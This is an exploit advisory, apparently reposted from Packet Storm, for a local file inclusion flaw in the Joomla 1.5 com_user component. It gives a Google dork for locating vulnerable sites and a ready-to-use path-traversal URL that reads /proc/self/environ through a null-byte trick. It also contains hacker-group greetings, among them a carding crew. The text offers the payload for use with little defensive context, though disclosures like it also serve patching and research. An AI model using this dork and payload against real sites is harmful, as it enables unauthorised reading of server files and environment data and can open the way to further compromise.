The Joomla User component version 1.5 suffers from a local file inclusion vulnerability.
3392f806efd7bd0738d3fdebacabdfff3c9a89ef50f7ee7f6c6b655f5bf41b83=========================================================
Joomla Component com_user Joomla 1.5 LFI Vulnerability
=========================================================
[+]Title : Joomla Component com_user Joomla 1.5 LFI Vulnerability
[+]Software : com_user Joomla 1.5
[+]Vendor : http://www.exadomain.com/
[+]Download : http://www.exadomain.com/exadomain-team/projects-repository/view.download/20
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home : http://josalijoe.wordpress.com/
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm jos_ali_joe member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
Dork : inurl:index.php?option="com_user"
########################################################################
------------------------------------------------------------------------
LFI Exploit
Exploit :
http://example.com/index.php?option=com_user&view=../../../../../../../../../../../../../../../proc/self/environ%00
--------------------------------------------------------------------------
Greets For :
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Tecon Crew - Security Hub
./Byroe Net - Yogya Carderlink - anten4
My Team : ./Indonesian Coder & inj3ct0r
Special Thanks :
/. google.com
[+] Note :
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed